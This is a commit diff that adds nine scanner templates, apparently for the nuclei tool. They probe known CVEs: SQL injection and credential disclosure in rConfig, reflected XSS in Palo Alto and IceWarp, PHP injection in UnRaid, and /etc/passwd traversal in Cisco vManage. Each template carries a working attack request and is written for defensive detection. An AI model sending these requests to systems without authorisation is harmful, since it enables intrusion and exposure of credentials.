commit
a3dbe4f2f9
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-10546
|
||||
info:
|
||||
name: rConfig 3.9.4 SQLi
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
|
||||
tags: SQLI
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "[project-discovery]"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-10547
|
||||
info:
|
||||
name: rConfig 3.9.4 SQLi
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
|
||||
tags: SQLI
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "[project-discovery]"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-10548
|
||||
info:
|
||||
name: rConfig 3.9.4 SQLi
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
|
||||
tags: SQLI
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "[project-discovery]"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-10549
|
||||
info:
|
||||
name: rConfig 3.9.4 SQLi
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
|
||||
tags: SQLI
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "[project-discovery]"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-2036
|
||||
info:
|
||||
name: Palo Alto Networks Reflected Cross Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
|
||||
tags: XSS
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-27982
|
||||
info:
|
||||
name: IceWarp WebMail Reflected XSS
|
||||
author: madrobot
|
||||
severity: medium
|
||||
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
||||
tags: XSS
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(1)>"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020-5847
|
||||
info:
|
||||
name: UnRaid Remote Code Execution
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
|
||||
tags: Directory Traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "http://www.php.net/"
|
||||
part: body
|
|
@ -0,0 +1,22 @@
|
|||
id: CVE-2020-9425
|
||||
info:
|
||||
name: rConfig Unauthenticated Sensitive Information Disclosure
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
|
||||
tags: Information Disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/settings.php"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "defaultNodeUsername"
|
||||
- "defaultNodePassword"
|
||||
part: body
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2020–26073
|
||||
info:
|
||||
name: Cisco SD-WAN vManage Software Directory Traversal
|
||||
author: madrobot
|
||||
severity: high
|
||||
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
|
||||
tags: Directory Traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
words:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue